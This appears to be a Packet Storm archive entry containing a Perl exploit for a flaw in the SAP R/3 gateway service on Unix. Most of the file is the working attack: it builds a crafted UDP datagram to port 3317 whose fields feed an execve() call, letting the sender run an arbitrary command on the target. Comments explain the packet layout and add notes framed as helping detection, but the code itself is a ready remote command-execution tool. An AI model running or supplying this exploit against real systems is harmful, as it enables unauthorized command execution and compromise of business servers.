r3mote_unix_UDPexec.pl.txt

2006-11-14T00:00:00
ID PACKETSTORM:52024
Type packetstorm
Reporter Nicob
Modified 2006-11-14T00:00:00

Description

                                        
                                            `#!/usr/bin/perl -w  
use IO::Socket;  
  
# Unix version of the FX SAP R/3 gwrd vuln.  
#  
# We partially control a call to execve() made by lnaxdm/sapsys  
# Easily exploitable with local access  
# Could be done remotely under some conditions  
# (this header does not say which releases are affected or what those conditions are)  
#  
# 2003, FX of Phenoelit <fx@phenoelit.de> (Win32 original code)  
# 2005, Nicob <nicob@nicob.net> (Unix version)  
#  
  
# Turn on autoflush for the currently selected output handle.
$|=1;

# Positional arguments, in order: filename, arg1, arg3, host, [port].
# Each "unless (... = shift)" test is a truthiness check, so an empty string
# or "0" is rejected the same way as a missing argument.
die "Give filename" unless ($command=shift);
die "Give arg1" unless ($param1=shift);
die "Give arg3" unless ($param3=shift);
# Both short arguments go into fixed 8-byte fields of the datagram (see the
# padding below), so anything longer is refused before the request is built.
die "Arg1 too long" if (length($param1) > 8);
die "Arg3 too long" if (length($param3) > 8);
die "Give host" unless ($host=shift);

# UDP destination port; falls back to 3317 when no fifth argument is given.
$port="3317" unless ($port=shift);

# Datagram layout as assembled below (offsets computed from the literals):
#   0..1    bytes 0x01 0x02
#   2..51   50 x 'B' filler
#   52..59  $param1, space-padded to 8 bytes
#   60..70  literal "_0_0_0_0_0_"
#   71..78  $param3, space-padded to 8 bytes
#   79..99  literal "_1_1_1_1_1__2_2_2_2_2"
#   100..   $command followed by one NUL byte
# For detection: every datagram this script sends has the same 100-byte
# framing, with only the two 8-byte fields and the trailing string varying.
# NOTE(review): the script does not say whether the filler and marker strings
# are required by the service or arbitrary; a signature keyed only on them
# may miss variants -- confirm against the vendor advisory.
$request =
"\x01".
"\x02".
"BBBBBBBBBB".
"BBBBBBBBBB".
"BBBBBBBBBB".
"BBBBBBBBBB".
"BBBBBBBBBB".

# Second arg to execve() (per the original author)
# 8 chars long; right-padded with spaces
$param1.
" " x (8 - length($param1)).

"_0_0_0_0_0_".

# Fourth arg to execve() (per the original author)
# 8 chars long; right-padded with spaces
$param3.
" " x (8 - length($param3)).

"_1_1_1_1_1__2_2_2_2_2".

# First arg to execve() (per the original author)
# Unlimited length, terminated with a NUL byte (\x00)
$command."\x00";

# send_UDP() is given only host and port; it reads the datagram from the
# global $request assigned above.
&send_UDP($host,$port);

exit 0;
  
# send_UDP($dest, $port)
#
# Opens a UDP socket to $dest:$port, writes the contents of the global
# $request to it as one print call, and closes the socket. Dies with
# "cannot get socket for $dest" when the socket cannot be created.
# No reply is read: the script never learns from the network whether the
# datagram was received or acted upon.
sub send_UDP {
    my ($dest, $port) = @_;

    # $port is stringified exactly as the original call did.
    my $sock = IO::Socket::INET->new(
        Proto    => "udp",
        PeerAddr => $dest,
        PeerPort => "$port",
    ) or die "cannot get socket for $dest";

    $sock->autoflush(1);

    # $request is not a parameter; it is the global built at file scope.
    print {$sock} $request;

    close $sock;
}
`